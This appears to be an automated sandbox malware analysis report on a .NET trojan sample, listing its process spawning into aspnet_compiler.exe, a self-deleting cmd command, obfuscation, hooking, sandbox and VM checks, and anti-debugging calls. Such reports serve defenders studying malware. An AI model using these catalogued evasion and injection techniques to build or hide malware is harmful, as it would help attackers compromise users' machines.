        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89A80 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89650 NtQueryValueKey,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89660 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89670 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89A00 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89610 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89A10 NtQuerySection,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89A20 NtResumeThread,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C897A0 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C8A3B0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89760 NtOpenProcess,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C8A770 NtOpenThread,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89B00 NtSetValueKey,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C8A710 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89730 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C898F0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C898A0 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C8B040 NtSuspendThread,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89820 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C899D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001C6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
        Source: U8RYIwIvfK.exe, 00000000.00000002.268661808.00000000027CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.270167815.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000000.252749623.0000000000254000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268746824.00000000027DC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268762286.00000000027E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe Binary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe ReversingLabs: Detection: 43%
        Source: U8RYIwIvfK.exe Virustotal: Detection: 38%
        Source: U8RYIwIvfK.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\U8RYIwIvfK.exe C:\Users\user\Desktop\U8RYIwIvfK.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.log
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@2/2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001DA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
        Source: U8RYIwIvfK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: U8RYIwIvfK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: U8RYIwIvfK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: U8RYIwIvfK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
        Source: Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp

        Data Obfuscation

        Source: U8RYIwIvfK.exe, u206a????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206a????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9392A push dword ptr [ecx]; iretd
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9A25E push 11BA938Bh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0112D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C76BD push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C76D1 push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C9D0D1 push ecx; ret

        Hooking and other Techniques for Hiding and Protection

        Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000129B6E second address: 0000000000129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 1104Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 3724Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01116DE6 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 5.3 %
        Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 0.7 %
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000004.00000000.328931675.00000000084D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000004.00000000.344274153.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000004.00000000.351265830.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
        Source: explorer.exe, 00000004.00000000.320881970.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
        Source: explorer.exe, 00000004.00000000.326654154.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000004.00000000.294164608.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000004.00000000.351359914.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

        Anti Debugging

        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9B950 CheckRemoteDebuggerPresent,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D2258 IsDebuggerPresent,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BAC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01116DE6 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0115A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DAD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01113D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01153540 mov eax, dword ptr fs:[00000030h]
